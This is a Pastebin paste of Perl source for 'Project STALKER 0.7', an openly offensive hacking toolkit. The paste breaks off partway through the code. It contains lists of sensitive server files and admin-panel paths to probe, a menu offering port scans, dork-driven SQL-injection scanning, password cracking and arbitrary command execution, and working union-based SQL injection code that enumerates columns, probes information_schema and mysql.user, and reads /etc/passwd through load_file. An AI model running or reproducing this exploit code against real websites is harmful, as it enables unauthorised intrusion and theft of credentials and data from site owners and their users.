API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 19th, 2012
315
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 59.70 KB | None | 0 0
raw download clone embed print report
  1. #!usr/bin/perl
  2. #Project STALKER 0.7
  3. #(C) Doddy Hackman 2011
  4. #
  5. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
  6. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
  7. #ppm install http://www.bribes.org/perl/ppm/Net-Whois-Raw.ppd
  8. #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
  9.  
  10. use IO::Socket;
  11. use HTML::LinkExtor;
  12. use LWP::UserAgent;
  13. use Win32::OLE qw(in);
  14. use Win32::Process;
  15. use Net::FTP;
  16. use Cwd;
  17. use URI::Split qw(uri_split);
  18. use MIME::Base64;
  19. use DBI;
  20. use Net::Whois::Raw;
  21. use Color::Output;
  22. Color::Output::Init
  23.  
  24. my @files = (
  25. 'C:/xampp/htdocs/aca.txt',
  26. 'C:/xampp/htdocs/aca.txt',
  27. 'C:/xampp/htdocs/admin.php',
  28. 'C:/xampp/htdocs/leer.txt',
  29. '../../../boot.ini',
  30. '../../../../boot.ini',
  31. '../../../../../boot.ini',
  32. '../../../../../../boot.ini',
  33. '/etc/passwd',
  34. '/etc/shadow',
  35. '/etc/shadow~',
  36. '/etc/hosts',
  37. '/etc/motd',
  38. '/etc/apache/apache.conf',
  39. '/etc/fstab',
  40. '/etc/apache2/apache2.conf',
  41. '/etc/apache/httpd.conf',
  42. '/etc/httpd/conf/httpd.conf',
  43. '/etc/apache2/httpd.conf',
  44. '/etc/apache2/sites-available/default',
  45. '/etc/mysql/my.cnf',
  46. '/etc/my.cnf',
  47. '/etc/sysconfig/network-scripts/ifcfg-eth0',
  48. '/etc/redhat-release',
  49. '/etc/httpd/conf.d/php.conf',
  50. '/etc/pam.d/proftpd',
  51. '/etc/phpmyadmin/config.inc.php',
  52. '/var/www/config.php',
  53. '/etc/httpd/logs/error_log',
  54. '/etc/httpd/logs/error.log',
  55. '/etc/httpd/logs/access_log',
  56. '/etc/httpd/logs/access.log',
  57. '/var/log/apache/error_log',
  58. '/var/log/apache/error.log',
  59. '/var/log/apache/access_log',
  60. '/var/log/apache/access.log',
  61. '/var/log/apache2/error_log',
  62. '/var/log/apache2/error.log',
  63. '/var/log/apache2/access_log',
  64. '/var/log/apache2/access.log',
  65. '/var/www/logs/error_log',
  66. '/var/www/logs/error.log',
  67. '/var/www/logs/access_log',
  68. '/var/www/logs/access.log',
  69. '/usr/local/apache/logs/error_log',
  70. '/usr/local/apache/logs/error.log',
  71. '/usr/local/apache/logs/access_log',
  72. '/usr/local/apache/logs/access.log',
  73. '/var/log/error_log',
  74. '/var/log/error.log',
  75. '/var/log/access_log',
  76. '/var/log/access.log',
  77. '/etc/group',
  78. '/etc/security/group',
  79. '/etc/security/passwd',
  80. '/etc/security/user',
  81. '/etc/security/environ',
  82. '/etc/security/limits',
  83. '/usr/lib/security/mkuser.default',
  84. '/apache/logs/access.log',
  85. '/apache/logs/error.log',
  86. '/etc/httpd/logs/acces_log',
  87. '/etc/httpd/logs/acces.log',
  88. '/var/log/httpd/access_log',
  89. '/var/log/httpd/error_log',
  90. '/apache2/logs/error.log',
  91. '/apache2/logs/access.log',
  92. '/logs/error.log',
  93. '/logs/access.log',
  94. '/usr/local/apache2/logs/access_log',
  95. '/usr/local/apache2/logs/access.log',
  96. '/usr/local/apache2/logs/error_log',
  97. '/usr/local/apache2/logs/error.log',
  98. '/var/log/httpd/access.log',
  99. '/var/log/httpd/error.log',
  100. '/opt/lampp/logs/access_log',
  101. '/opt/lampp/logs/error_log',
  102. '/opt/xampp/logs/access_log',
  103. '/opt/xampp/logs/error_log',
  104. '/opt/lampp/logs/access.log',
  105. '/opt/lampp/logs/error.log',
  106. '/opt/xampp/logs/access.log',
  107. '/opt/xampp/logs/error.log',
  108. 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
  109. 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
  110. '/usr/local/apache/conf/httpd.conf',
  111. '/usr/local/apache2/conf/httpd.conf',
  112. '/etc/apache/conf/httpd.conf',
  113. '/usr/local/etc/apache/conf/httpd.conf',
  114. '/usr/local/apache/httpd.conf',
  115. '/usr/local/apache2/httpd.conf',
  116. '/usr/local/httpd/conf/httpd.conf',
  117. '/usr/local/etc/apache2/conf/httpd.conf',
  118. '/usr/local/etc/httpd/conf/httpd.conf',
  119. '/usr/apache2/conf/httpd.conf',
  120. '/usr/apache/conf/httpd.conf',
  121. '/usr/local/apps/apache2/conf/httpd.conf',
  122. '/usr/local/apps/apache/conf/httpd.conf',
  123. '/etc/apache2/conf/httpd.conf',
  124. '/etc/http/conf/httpd.conf',
  125. '/etc/httpd/httpd.conf',
  126. '/etc/http/httpd.conf',
  127. '/etc/httpd.conf',
  128. '/opt/apache/conf/httpd.conf',
  129. '/opt/apache2/conf/httpd.conf',
  130. '/var/www/conf/httpd.conf',
  131. '/private/etc/httpd/httpd.conf',
  132. '/private/etc/httpd/httpd.conf.default',
  133. '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  134. '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  135. '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  136. 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
  137. 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
  138. 'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
  139. '/usr/local/php/httpd.conf.php',
  140. '/usr/local/php4/httpd.conf.php',
  141. '/usr/local/php5/httpd.conf.php',
  142. '/usr/local/php/httpd.conf',
  143. '/usr/local/php4/httpd.conf',
  144. '/usr/local/php5/httpd.conf',
  145. '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  146. '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  147. '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  148. '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  149. '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  150. '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  151. '/usr/local/etc/apache/vhosts.conf',
  152. '/etc/php.ini',
  153. '/bin/php.ini',
  154. '/etc/httpd/php.ini',
  155. '/usr/lib/php.ini',
  156. '/usr/lib/php/php.ini',
  157. '/usr/local/etc/php.ini',
  158. '/usr/local/lib/php.ini',
  159. '/usr/local/php/lib/php.ini',
  160. '/usr/local/php4/lib/php.ini',
  161. '/usr/local/php5/lib/php.ini',
  162. '/usr/local/apache/conf/php.ini',
  163. '/etc/php4.4/fcgi/php.ini',
  164. '/etc/php4/apache/php.ini',
  165. '/etc/php4/apache2/php.ini',
  166. '/etc/php5/apache/php.ini',
  167. '/etc/php5/apache2/php.ini',
  168. '/etc/php/php.ini',
  169. '/etc/php/php4/php.ini',
  170. '/etc/php/apache/php.ini',
  171. '/etc/php/apache2/php.ini',
  172. '/web/conf/php.ini',
  173. '/usr/local/Zend/etc/php.ini',
  174. '/opt/xampp/etc/php.ini',
  175. '/var/local/www/conf/php.ini',
  176. '/etc/php/cgi/php.ini',
  177. '/etc/php4/cgi/php.ini',
  178. '/etc/php5/cgi/php.ini',
  179. 'c:\php5\php.ini',
  180. 'c:\php4\php.ini',
  181. 'c:\php\php.ini',
  182. 'c:\PHP\php.ini',
  183. 'c:\WINDOWS\php.ini',
  184. 'c:\WINNT\php.ini',
  185. 'c:\apache\php\php.ini',
  186. 'c:\xampp\apache\bin\php.ini',
  187. 'c:\NetServer\bin\stable\apache\php.ini',
  188. 'c:\home2\bin\stable\apache\php.ini',
  189. 'c:\home\bin\stable\apache\php.ini',
  190. '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  191. '/usr/local/cpanel/logs',
  192. '/usr/local/cpanel/logs/stats_log',
  193. '/usr/local/cpanel/logs/access_log',
  194. '/usr/local/cpanel/logs/error_log',
  195. '/usr/local/cpanel/logs/license_log',
  196. '/usr/local/cpanel/logs/login_log',
  197. '/var/cpanel/cpanel.config',
  198. '/var/log/mysql/mysql-bin.log',
  199. '/var/log/mysql.log',
  200. '/var/log/mysqlderror.log',
  201. '/var/log/mysql/mysql.log',
  202. '/var/log/mysql/mysql-slow.log',
  203. '/var/mysql.log',
  204. '/var/lib/mysql/my.cnf',
  205. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
  206. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
  207. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
  208. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
  209. 'C:\ProgramFiles\MySQL\data\hostname.err',
  210. 'C:\ProgramFiles\MySQL\data\mysql.log',
  211. 'C:\ProgramFiles\MySQL\data\mysql.err',
  212. 'C:\ProgramFiles\MySQL\data\mysql-bin.log',
  213. 'C:\MySQL\data\hostname.err',
  214. 'C:\MySQL\data\mysql.log',
  215. 'C:\MySQL\data\mysql.err',
  216. 'C:\MySQL\data\mysql-bin.log',
  217. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
  218. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
  219. 'C:\ProgramFiles\MySQL\my.ini',
  220. 'C:\ProgramFiles\MySQL\my.cnf',
  221. 'C:\MySQL\my.ini',
  222. 'C:\MySQL\my.cnf',
  223. '/etc/logrotate.d/proftpd',
  224. '/www/logs/proftpd.system.log',
  225. '/var/log/proftpd',
  226. '/etc/proftp.conf',
  227. '/etc/protpd/proftpd.conf',
  228. '/etc/vhcs2/proftpd/proftpd.conf',
  229. '/etc/proftpd/modules.conf',
  230. '/var/log/vsftpd.log',
  231. '/etc/vsftpd.chroot_list',
  232. '/etc/logrotate.d/vsftpd.log',
  233. '/etc/vsftpd/vsftpd.conf',
  234. '/etc/vsftpd.conf',
  235. '/etc/chrootUsers',
  236. '/var/log/xferlog',
  237. '/var/adm/log/xferlog',
  238. '/etc/wu-ftpd/ftpaccess',
  239. '/etc/wu-ftpd/ftphosts',
  240. '/etc/wu-ftpd/ftpusers',
  241. '/usr/sbin/pure-config.pl',
  242. '/usr/etc/pure-ftpd.conf',
  243. '/etc/pure-ftpd/pure-ftpd.conf',
  244. '/usr/local/etc/pure-ftpd.conf',
  245. '/usr/local/etc/pureftpd.pdb',
  246. '/usr/local/pureftpd/etc/pureftpd.pdb',
  247. '/usr/local/pureftpd/sbin/pure-config.pl',
  248. '/usr/local/pureftpd/etc/pure-ftpd.conf',
  249. '/etc/pure-ftpd/pure-ftpd.pdb',
  250. '/etc/pureftpd.pdb',
  251. '/etc/pureftpd.passwd',
  252. '/etc/pure-ftpd/pureftpd.pdb',
  253. '/var/log/pure-ftpd/pure-ftpd.log',
  254. '/logs/pure-ftpd.log',
  255. '/var/log/pureftpd.log',
  256. '/var/log/ftp-proxy/ftp-proxy.log',
  257. '/var/log/ftp-proxy',
  258. '/var/log/ftplog',
  259. '/etc/logrotate.d/ftp',
  260. '/etc/ftpchroot',
  261. '/etc/ftphosts',
  262. '/var/log/exim_mainlog',
  263. '/var/log/exim/mainlog',
  264. '/var/log/maillog',
  265. '/var/log/exim_paniclog',
  266. '/var/log/exim/paniclog',
  267. '/var/log/exim/rejectlog',
  268. '/var/log/exim_rejectlog'
  269. );
  270.  
  271. @panels = (
  272. 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx'
  273. , 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp',
  274. 'admin/webmaster.aspx'
  275. , 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
  276. 'asp/admin/admin.aspx'
  277. , 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/',
  278. 'login.asp', 'login.aspx'
  279. , 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
  280. 'login/index.asp', 'login/index.aspx'
  281. , 'login/login.asp', 'login/login.aspx', 'login/admin.asp',
  282. 'login/admin.aspx'
  283. , 'administracion/index.asp', 'administracion/index.aspx',
  284. 'administracion/login.asp'
  285. , 'administracion/login.aspx', 'administracion/webmaster.asp',
  286. 'administracion/webmaster.aspx'
  287. , 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
  288. 'admin/admin.php'
  289. , 'admin/index.php', 'admin/login.php', 'admin/system.php',
  290. 'admin/ingresar.php'
  291. , 'admin/administrador.php', 'admin/default.php', 'administracion/',
  292. 'administracion/index.php'
  293. , 'administracion/login.php', 'administracion/ingresar.php',
  294. 'administracion/admin.php'
  295. , 'administration/', 'administration/index.php', 'administration/login.php'
  296. , 'administrator/index.php', 'administrator/login.php',
  297. 'administrator/system.php', 'system/'
  298. , 'system/login.php', 'admin.php', 'login.php', 'administrador.php',
  299. 'administration.php'
  300. , 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php',
  301. 'admin2.html', 'yonetim.php'
  302. , 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
  303. 'admin/account.php', 'admin/account.html'
  304. , 'admin/index.html', 'admin/login.html', 'admin/home.php',
  305. 'admin/controlpanel.html'
  306. , 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
  307. 'cp.php', 'cp.html'
  308. , 'administrator/', 'administrator/index.html', 'administrator/login.html'
  309. , 'administrator/account.html', 'administrator/account.php',
  310. 'administrator.html', 'login.html'
  311. , 'modelsearch/login.php', 'moderator.php', 'moderator.html',
  312. 'moderator/login.php'
  313. , 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
  314. 'moderator/'
  315. , 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php',
  316. 'controlpanel.html'
  317. , 'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
  318. 'adminpanel.html', 'admin1.asp'
  319. , 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
  320. 'admin/home.asp'
  321. , 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
  322. 'administrator/index.asp'
  323. , 'administrator/login.asp', 'administrator/account.asp',
  324. 'administrator.asp'
  325. , 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp',
  326. 'moderator/admin.asp'
  327. , 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
  328. 'fileadmin/'
  329. , 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html',
  330. 'sysadmin.php'
  331. , 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/',
  332. 'ur-admin.asp'
  333. , 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html'
  334. , 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html'
  335. , 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php',
  336. 'webadmin.asp'
  337. , 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp'
  338. , 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/'
  339. , 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/',
  340. 'administrators/'
  341. , 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/',
  342. 'SysAdmin/'
  343. , 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/',
  344. 'cpanel/'
  345. , 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/',
  346. 'formslogin/
  347. ', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/
  348. ', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
  349. 'login-redirect/
  350. ', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/',
  351. 'smblogin/
  352. ', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/',
  353. 'bigadmin/'
  354. , 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/',
  355. 'openvpnadmin/'
  356. , 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
  357. 'newsadmin/', 'adminpro/'
  358. , 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/',
  359. 'ccp14admin/'
  360. , 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/'
  361. , 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/'
  362. , 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/'
  363. , 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
  364. 'logo_sysadmin/'
  365. , 'server/', 'database_administration/', 'power_user/',
  366. 'system_administration/'
  367. , 'ss_vms_admin_sm/'
  368. );
  369.  
  370. unless ( -d "/logs/webs" ) {
  371. mkdir( "logs/", 777 );
  372. mkdir( "logs/webs/", 777 );
  373. }
  374.  
  375. my $nave = LWP::UserAgent->new;
  376. $nave->agent(
  377. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  378. );
  379. $nave->timeout(5);
  380.  
  381. head();
  382.  
  383. getinfo();
  384.  
  385. $SIG{INT} = \&next;
  386.  
  387. while (1) {
  388. cprint "\x037"; #13
  389. menujo();
  390. cprint "\x030";
  391. }
  392.  
  393. sub getinfo {
  394. $so = $^O;
  395. $login = Win32::LoginName();
  396. $domain = Win32::DomainName();
  397. cprint "\x0313"; #13
  398. print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
  399. cprint "\x030";
  400. }
  401.  
  402. sub menujo {
  403. print "\n\n>";
  404. chomp( my $cmd = <stdin> );
  405. print "\n\n";
  406.  
  407. if ( $cmd =~ /getinfo/ig ) {
  408. getinfo();
  409. }
  410. if ( $cmd =~ /getip (.*)/ ) {
  411. my $te = $1;
  412. if ( $te eq "" or $te eq " " ) {
  413. print "\n[+] sintax : getip <host>\n";
  414. }
  415. print "\n[IP] : " . getip($1) . "\n";
  416. print "\n";
  417. }
  418.  
  419. elsif ( $cmd =~ /whois (.*)/ ) {
  420. my $te = $1;
  421. if ( $te eq "" or $te eq " " ) {
  422. print "\n[+] sintax : whois <host>\n";
  423. }
  424. print "[+] Getting data\n\n";
  425. print whois($te);
  426. print "\n\n";
  427. }
  428.  
  429. elsif ( $cmd =~ /locate (.*)/ ) {
  430. my $te = $1;
  431. if ( $te eq "" or $te eq " " ) {
  432. print "\n[+] sintax : locate <host>\n";
  433. }
  434. infocon($te);
  435. print "\n\n";
  436. }
  437.  
  438. elsif ( $cmd =~ /getlink (.*)/ ) {
  439. print "[+] Extracting links in the page\n\n\n";
  440. $code = toma($1);
  441. my @re = get_links($code);
  442. for my $url (@re) {
  443. print "[Link] : $url\n";
  444. }
  445. print "\n\n[+] Finish\n";
  446. }
  447.  
  448. elsif ( $cmd =~ /help/ ) {
  449. helpme();
  450. }
  451.  
  452. elsif ( $cmd =~ /getprocess/ ) {
  453. my %re = getprocess();
  454.  
  455. for my $data ( keys %re ) {
  456. ( $proceso, $pid ) = ( $t =~ /(.*):(.*)/ig );
  457. print "[+] Proceso : " . $data . "\n";
  458. print "[+] PID : " . $re{$data} . "\n\n";
  459. }
  460. }
  461. elsif ( $cmd =~ /killprocess (.*)/ ) {
  462. my $d = $1;
  463. if ( killprocess($d) ) {
  464. print "[+] Process closed\n";
  465. }
  466. }
  467. elsif ( $cmd =~ /conec (.*) (.*) (.*)/ ) {
  468. print conectar( $1, $2, $3 );
  469. }
  470. elsif ( $cmd =~ /allow (.*)/ ) {
  471. $re = conectar( $1, "80", "GET / HTTP/1.0\r\n" );
  472. if ( $re =~ /Allow:(.*)/ig ) {
  473. print "[+] Metodos : " . $1 . "\n";
  474. }
  475. }
  476. elsif ( $cmd =~ /paths (.*)/ ) {
  477. scanpaths($1);
  478. }
  479. elsif ( $cmd =~ /encodehex (.*)/ ) {
  480. print "\n\n[+] " . hex_en($1) . "\n\n";
  481. }
  482. elsif ( $cmd =~ /decodehex (.*)/ ) {
  483. print "\n\n[+] " . hex_de($1) . "\n\n";
  484. }
  485. elsif ( $cmd =~ /download (.*) (.*)/ ) {
  486. my $file, $name = $1, $2;
  487. if ( download( $1, $2 ) ) {
  488. print "[+] File downloaded\n";
  489. }
  490. }
  491. elsif ( $cmd =~ /encodeascii (.*)/ ) {
  492. print "\n\n[+] " . ascii($1) . "\n\n";
  493. }
  494. elsif ( $cmd =~ /decodeascii (.*)/ ) {
  495. print "\n\n[+] " . ascii_de($1) . "\n\n";
  496. }
  497. elsif ( $cmd =~ /encodebase (.*)/ ) {
  498. print "\n\n[+] " . base($1) . "\n\n";
  499. }
  500. elsif ( $cmd =~ /decodebase (.*)/ ) {
  501. print "\n\n[+] " . base_de($1) . "\n\n";
  502. }
  503. elsif ( $cmd =~ /aboutme/ ) {
  504. aboutme();
  505. }
  506. elsif ( $cmd =~ /scanport (.*)/ ) {
  507. scanport($1);
  508. }
  509. elsif ( $cmd =~ /panel (.*)/ ) {
  510. scanpanel($1);
  511. }
  512. elsif ( $cmd =~ /scangoogle/ ) {
  513. print "[Dork] : ";
  514. chomp( my $dork = <stdin> );
  515. print "\n\n[Pages] : ";
  516. chomp( my $pages = <stdin> );
  517. print "\n\n[Starting the search]\n\n";
  518. my @links = google( $dork, $pages );
  519. print "\n[Links Found] : " . int(@links) . "\n\n\n";
  520. print "[Starting the scan]\n\n\n";
  521.  
  522. for my $link (@links) {
  523. if ( $link =~ /(.*)=/ig ) {
  524. my $web = $1;
  525. sql( $web . "=" );
  526. }
  527. }
  528. print "\n\n[+] Finish\n";
  529. }
  530. elsif ( $cmd =~ /getpass (.*)/ ) {
  531. crackit($1);
  532. }
  533. elsif ( $cmd =~ /ftp (.*) (.*) (.*)/ ) {
  534. ftp( $1, $2, $3 );
  535. }
  536. elsif ( $cmd =~ /navegator/ ) {
  537. nave:
  538. print getcwd() . ">";
  539. chomp( my $rta = <stdin> );
  540. print "\n\n";
  541. if ( $rta =~ /list/ ) {
  542. my @files = coleccionar( getcwd() );
  543. for (@files) {
  544. if ( -f $_ ) {
  545. print "[File] : " . $_ . "\n";
  546. }
  547. else {
  548. print "[Directory] : " . $_ . "\n";
  549. }
  550. }
  551. }
  552. if ( $rta =~ /cd (.*)/ ) {
  553. my $dir = $1;
  554. if ( chdir($dir) ) {
  555. print "\n[+] Directory changed\n";
  556. }
  557. else {
  558. print "\n[-] Error\n";
  559. }
  560. }
  561. if ( $rta =~ /del (.*)/ ) {
  562. my $file = getcwd() . "/" . $1;
  563. if ( -f $file ) {
  564. if ( unlink($file) ) {
  565. print "\n[+] File Deleted\n";
  566. }
  567. else {
  568. print "\n[-] Error\n";
  569. }
  570. }
  571. else {
  572. if ( rmdir($file) ) {
  573. print "\n[+] Directory Deleted\n";
  574. }
  575. else {
  576. print "\n[-] Error\n";
  577. }
  578. }
  579. }
  580. if ( $rta =~ /rename (.*) (.*)/ ) {
  581. if ( rename( getcwd() . "/" . $1, getcwd() . "/" . $2 ) ) {
  582. print "\n[+] File Changed\n";
  583. }
  584. else {
  585. print "\n[-] Error\n";
  586. }
  587. }
  588. if ( $rta =~ /open (.*)/ ) {
  589. my $file = $1;
  590. chomp $file;
  591. system($file);
  592.  
  593. #system(getcwd()."/".$file);
  594. }
  595. if ( $rta =~ /help/ ) {
  596. print "\nCommands : help cd list del rename open exit\n\n";
  597. }
  598. if ( $rta =~ /exit/ ) {
  599. next;
  600. }
  601. print "\n\n";
  602. goto nave;
  603. }
  604. elsif ( $cmd =~ /kobra (.*)/ ) {
  605. my $url = $1;
  606. chomp $url;
  607. scansqli( $url, "--" );
  608. }
  609. elsif ( $cmd =~ /mysql (.*) (.*) (.*)/ ) {
  610. enter( $1, $2, $3 );
  611. }
  612. elsif ( $cmd =~ /exit/ ) {
  613. copyright();
  614. <stdin>;
  615. exit(1);
  616. }
  617. else {
  618. system($cmd);
  619. }
  620.  
  621. #print "\n\n";
  622. }
  623.  
  624. sub scansqli {
  625.  
  626. my $page = $_[0];
  627. print "[Status] : Scanning.....\n";
  628. ( $pass1, $bypass2 ) = &bypass( $_[1] );
  629. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  630. my $save = $auth;
  631.  
  632. if ( $_[0] =~ /hackman/ig ) {
  633. savefile( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" );
  634. &menu_options( $_[0], $pass, $save );
  635. }
  636. else {
  637.  
  638. my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
  639. my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
  640.  
  641. unless ( $testar1 eq $testar2 ) {
  642. motor( $page, $_[1] );
  643. }
  644. else {
  645. print "\n[-] Not vulnerable\n\n";
  646. print "[+] Scan anyway y/n : ";
  647. chomp( my $op = <stdin> );
  648. if ( $op eq "y" ) {
  649. motor( $page, $_[1] );
  650. }
  651. else {
  652.  
  653. #head();
  654. #menu();
  655. }
  656. }
  657. }
  658. }
  659.  
  660. sub motor {
  661.  
  662. my ( $gen, $save, $control ) = &length( $_[0], $_[1] );
  663.  
  664. if ( $control eq 1 ) {
  665. print "[Status] : Enjoy the menu\n\n";
  666. &menu_options( $gen, $pass, $save );
  667. }
  668. else {
  669. print "[Status] : Length columns not found\n\n";
  670. }
  671. }
  672.  
  673. sub length {
  674. print "\n[+] Looking for the number of columns\n\n";
  675. my $rows = "0";
  676. my $asc;
  677. my $page = $_[0];
  678. ( $pass1, $pass2 ) = &bypass( $_[1] );
  679.  
  680. $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  681. $total = "1";
  682. for my $rows ( 2 .. 200 ) {
  683. $asc .=
  684. "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  685. $total .= "," . $rows;
  686. $injection =
  687. $page . "1"
  688. . $pass1 . "and"
  689. . $pass1 . "1=0"
  690. . $pass1 . "union"
  691. . $pass1
  692. . "select"
  693. . $pass1
  694. . $alert
  695. . $asc;
  696. $test = toma($injection);
  697. if ( $test =~ /RATSXPDOWN/ ) {
  698. @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  699. $control = 1;
  700. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  701. my $save = $auth;
  702. savefile( $save . ".txt", "\n[Target confirmed] : $page" );
  703. savefile( $save . ".txt", "[Bypass] : $_[1]\n" );
  704. savefile( $save . ".txt", "[Limit] : The site has $rows columns" );
  705. savefile( $save . ".txt",
  706. "[Data] : The number @number print data" );
  707. $total =~ s/$number[0]/hackman/;
  708. savefile(
  709. $save . ".txt",
  710. "[SQLI] : "
  711. . $page . "1"
  712. . $pass1 . "and"
  713. . $pass1 . "1=0"
  714. . $pass1 . "union"
  715. . $pass1
  716. . "select"
  717. . $pass1
  718. . $total
  719. );
  720. return (
  721. $page . "1"
  722. . $pass1 . "and"
  723. . $pass1 . "1=0"
  724. . $pass1 . "union"
  725. . $pass1
  726. . "select"
  727. . $pass1
  728. . $total,
  729. $save, $control
  730. );
  731. }
  732. }
  733. }
  734.  
  735. sub details {
  736. my ( $page, $bypass, $save ) = @_;
  737. ( $pass1, $pass2 ) = &bypass($bypass);
  738. savefile( $save . ".txt", "\n" );
  739. if ( $page =~ /(.*)hackman(.*)/ig ) {
  740. print "\n[+] Searching information..\n\n";
  741. my ( $start, $end ) = ( $1, $2 );
  742. $inforschema =
  743. $start
  744. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  745. . $end
  746. . $pass1 . "from"
  747. . $pass1
  748. . "information_schema.tables"
  749. . $pass2;
  750. $mysqluser =
  751. $start
  752. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  753. . $end
  754. . $pass1 . "from"
  755. . $pass1
  756. . "mysql.user"
  757. . $pass2;
  758. $test3 =
  759. toma( $start
  760. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  761. . $end
  762. . $pass2 );
  763. $test1 = toma($inforschema);
  764. $test2 = toma($mysqluser);
  765. if ( $test2 =~ /ERTOR854/ig ) {
  766. savefile( $save . ".txt", "[mysql.user] : ON" );
  767. print "[mysql.user] : ON\n";
  768. }
  769. else {
  770. print "[mysql.user] : OFF\n";
  771. savefile( $save . ".txt", "[mysql.user] : OFF" );
  772. }
  773. if ( $test1 =~ /ERTOR854/ig ) {
  774. print "[information_schema.tables] : ON\n";
  775. savefile( $save . ".txt", "[information_schema.tables] : ON" );
  776. }
  777. else {
  778. print "[information_schema.tables] : OFF\n";
  779. savefile( $save . ".txt", "[information_schema.tables] : OFF" );
  780. }
  781. if ( $test3 =~ /ERTOR854/ig ) {
  782. print "[load_file] : ON\n";
  783. savefile(
  784. $save . ".txt",
  785. "[load_file] : "
  786. . $start
  787. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  788. . $end
  789. . $pass2
  790. );
  791. }
  792. $concat =
  793. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  794. $injection = $start . $concat . $end . $pass2;
  795. $code = toma($injection);
